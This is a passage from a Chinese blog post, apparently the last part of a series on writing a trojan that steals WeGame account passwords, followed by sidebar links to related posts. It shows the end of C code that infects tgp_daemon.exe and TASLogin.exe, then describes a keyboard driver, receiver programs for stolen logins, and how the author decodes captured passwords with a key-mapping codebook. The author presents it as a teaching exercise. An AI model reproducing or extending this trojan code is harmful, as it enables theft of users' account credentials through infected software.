		if (dwPointer == 0xffffffff) {
			printf("文件指针移到头出错!");
			CloseHandle(hFile);
			GlobalFree(pFileMem);
			return;
		}
		BOOL bRet = WriteFile(hFile, pFileMem, dwFileSize + dwApplySize, &dwWriteFact, NULL);
		if (!bRet || dwWriteFact != dwFileSize + dwApplySize) {
			printf("写出出错!");
		}
		CloseHandle(hFile);
		GlobalFree(pFileMem);
		if (i == 0) {
			printf("感染tgp_daemon.exe成功!\n");
		}
		else
		{
			printf("感染TASLogin.exe成功!\n");
		}
	}
	system("pause");
	
}

 

最终运行效果图:

      

 上面3个是驱动文件,中间又边是病毒EXE,中间左边是WeGame。

这两个是接收账号和密码的EXE。

上面是安装的驱动。

 感染效果图。

我输入的密码是0987654321,密码本是通过模拟按键1234567890获得的。可以看到模拟1234567890获得的对应关系是5341726890。接下来我捕获的未解密密码是0986271435,对照密码本翻译显然就是我的输入密码0987654321.O(∩_∩)O!!!

结语:

     作为一个新手写这个盗号木马其实还是碰到很多问题的,不知道调试了多少次-。-//。这个木马实用性不强,合适教学吧,或者娱乐哈哈。这里完整的介绍了一个木马的生成过程,不知道其他人怎么做木马的,是不是和我差不多-。-///。

Liiiiiiiiiiiiiiiiiiq
关注
企业风控如何搭建四大体系,实现全局防控?
SHUMEITECH的博客
12-09 3594
六年专业反黑产,8000字精华输出,值得收藏
互联网通信安全
qq_48456652的博客
10-02 1633
目录 一、什么是互联网通信安全 1、互联网通信应用 2、互联网通信应用的安全问题 二、为什么要关注互联网通信安全 1. 原因之一互联网通信的巨大用户规模 2、原因之二互联网通信的特性 3、原因之三互联网通信面临的巨大安全威胁 三、电子邮件应用安全 1、基本概念 2、电子邮件安全威胁 3、电子邮件安全防护 四、即时通讯应用安全 1、即时通讯安全与风险 2、如何安全使用即时通讯应用 一、什么是互联网通信安全 1、互联网通信应用 通信的进化史: 互联网通信技术: 互联
盗号木马之旅(二)
qq_36760780的博客
08-14 1507
背景:        看完了第一篇  WeGame盗号木马之旅(一)  ,相信读者已经大概明白了我们需要干什么。下面我稍微详细的介绍一下我们接下来需要实现的部分:         一、编写驱动级键盘模拟点击驱动。         二、编写具体注入到目标EXE,实现按键截取的代码。         三、编写服务端接受消息的程序。         四、编写具体的病毒EXE,实现感染目标EXE...
VC++盗号木马源码分析
I'm a hack----
10-03 5168
VC++ 网游dll盗号木马源码2009-09-06 12:19前段时间,在lonkil前辈的网站上看到的一款DLL网游木马源码,确实佩服...(幸亏这类牛人没走这道儿,不然中国网民会死得很惨的~~~~)/** main.cpp **/#include BYTE userCode[7]={0x8B,0x45,0x0C,0x50,0x8D,0x4B,0x5C}; BYTE userJmpC
病毒木马查杀实战第010篇:QQ盗号木马之十六进制代码分析
Gleam的专栏
12-25 4189
一、前言 按照我的个人习惯,在运用诸如IDA Pro与OllyDBG对病毒进行逆向分析之前,我都会利用一些自动化的工具,通过静态或动态的分析方法(参见《病毒木马查杀第008篇:熊猫烧香之病毒查杀总结》)来对病毒的行为产生一定的认识,这样在之后的逆向分析中,我就能够产生“先入为主”的心态,在分析反汇编代码的时候就能够比较顺利。本文论述的是通过静态分析方法来理解我们的目标病毒,看看仅仅通过观察其十六
盗号木马之旅(三)
qq_36760780的博客
08-14 1047
背景:        上一篇 WeGame盗号木马之旅(二) 我们实现了键盘按键模拟驱动的开发,这篇我们实现下具体注入代码的编写。 目标:       具体的注入代码编写。实现账号获取和密码获取。 实现:       下面放两张图形象的说明我们这篇具体是写什么代码: 上面就是具体的感染过程。这一篇我们写的注入代码就是上面橙色框内的代码,后面我们会写InfectiveVirus....
ICESWORD冰刃,居家旅行之必备
09-21
"上可防盗杀敌",意味着这款工具能够帮助用户发现并消除计算机中的病毒、木马、间谍软件等恶意程序,保护用户的系统安全,防止数据被窃取或破坏。而"下可切菜肉"则象征着ICESWORD具备的系统维护和优化功能,它可以...
shashashazi.bat
06-20
网络安全测试代码,木马程序实例,请谨慎下载该文件 ,盗号木马程序 、
猿学~黑客、红客、白帽子之间的技术较量,为什么大公司都有黑客团队?
热门推荐
全栈开发者
04-14 2万+
【全栈开发者2017年04月14日讯】QQ号、信用卡密码、企业核心数据库,在地下黑色产业链上,互联网上的一切信息都可能成为黑帽子黑客牟利的工具。处于防御姿态的白帽子黑客在与黑帽子黑客的较量中,赢一次不能算赢,输一次就永远输了。 “世界上有三种人:一种是被黑过,一种是不知道自己被黑过,还有一种是不承认自己被黑过。” 一位穿着灰衬衣黑长裤的年轻人在发表演讲。他中等个头、精瘦,略显紧张地单手插在...
一个网游盗号木马的汇编源码分析
曾健生的专栏
05-03 3059
 【文章标题】:一个网游盗号木马的汇编源码分析【文章作者】:  newjueqi  【作者邮箱】: zengjiansheng1@126.com【作者QQ号】: 190678908【使用工具】: IDA【操作平台】: XP-SP2【作者声明】: 今年7月份学会汇编,9月份买了《加密与解密3》正式开始学软件安全,这段时间走过来后感慨良多!在新的一年来临之前,发表篇文章纪念一下 ^-^ 本文曾
从扫码登录的原理分析QQ大量被盗事件
最新发布
dzqxwzoe的博客
02-01 1477
根据酷安大佬@JiuXia2025 的说法,此次大量 QQ 被盗是因为用户点了某个链接,然后被 js 劫取了浏览器里面的 Cookie,黑客从中拿到了能控制 QQ 账号的 key,从而批量发送图片。网吧里面的 WeGame 被黑客注入了,然后黑客用手表 QQ 的登录二维码伪装成 WeGame 的登录二维码,劫持了用户的授权信息,黑客利用授权信息和腾讯服务器交互,批量发送图片。这种说法的核心是:学习通泄漏了用户的信息,然后有些用户学习通的密码和 QQ 密码设置的是一样,间接导致用户 QQ 密码泄漏。
车道线检测(二)——使用MNN部署PINet
On my way
09-06 1192
使用MNN部署PINet网络实现车道线检测
车道线检测(一)——PINet论文阅读
On my way
09-04 2807
2020年的一篇论文,基于关键点检测和实例分割技术提出一个Point Instance Network(PINet)来检测车道线。网络中包含几个同时训练的stacked hourglass networks,可裁切后不用再训练直接使用来减小模型运算量。网络可适应不同数量的车道线,在TuSimple数据集和Culane数据集上获得不错的精度和较低的false postitve。
实现ll命令
weixin_34242331的博客
12-21 274
$ ll wgettotal 544drwxr-xr-x 3 orisun orisun 4096 2011-12-15 09:48 ./drwxr-xr-x 65 orisun orisun 4096 2011-12-20 19:45 ../drwxr-xr-x 11 orisun orisun 4096 2011-08-09 21:55 wget-1.13/-rw-r--r-- 1 orisu...
ShellCode入门(提取ShellCode)
05-16 558
什么是ShellCode: 在计算机安全中,shellcode是一小段代码,可以用于软件漏洞利用的载荷。被称为“shellcode”是因为它通常启动一个命令终端,攻击者可以通过这个终端控制受害的计算机,但是所有执行类似任务的代码片段都可以称作shellcode。Shellcode通常是以机器码形式编写的,所以我们要学习硬编码。 char shellcode[] = ...
遭遇Trojan.PSW.OnlineGames、Trojan.HiJack.a、Trojan.PSW.ZhuXian.b等
Purpleendurer@CSDN
06-08 7978
endurer 原创2007-06-08  第1版一位网友说他的电脑最近反应速度很慢,让偶通过QQ远程协助帮忙检修。先用msconfig检查,发现了一些可疑启劝项,把金山毒霸升级到最新后扫描系统,没有发现病毒。到 http://endurer.ys168.com 下载 HijackThis 和 瑞星杀毒助手 Aide4Rav。到 http://purpleendurer.ys168.c
盗号木马分析
u011636170的专栏
11-22 3292
木马共采用vb和c#两种外壳,来保护真正的核心代码,并采用采用对核心代码加密来躲避杀软,从执行到结束都在内存中,无交互,收集完信息之后直接通过RC4加密后发送到C&C服务器,同时里面有很多反虚拟机和反分析技术。发送完信息直接删除原文件,消失的无影无踪。经分析发现,此盗号木马通过本地的一些配置、缓存、.dat文件可以盗取多种FTP、浏览器、邮箱、虚拟币的账号和密码。代码分析 此木马一共分为两个版本分
kali工具讲解——信息收集类:acccheck(icmp协议分析)(密码破解工具)
Culprit的博客
07-25 1205
acccheck 1密码破解工具 2SMBX协议分析工具; TCP445 17010漏洞 MS08-067 WannaCry 原理: 尝试连接目标默认共享: 1.IPC$:提供给acccherk一个用户名密码;或者一个用户名或密码表单,ta会字典式破解; 2.ADMIN$:windows目录共享,默认情况只有管理员可以访问共享; 命令参数: t/T:t可以指定IP地址;TIP...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值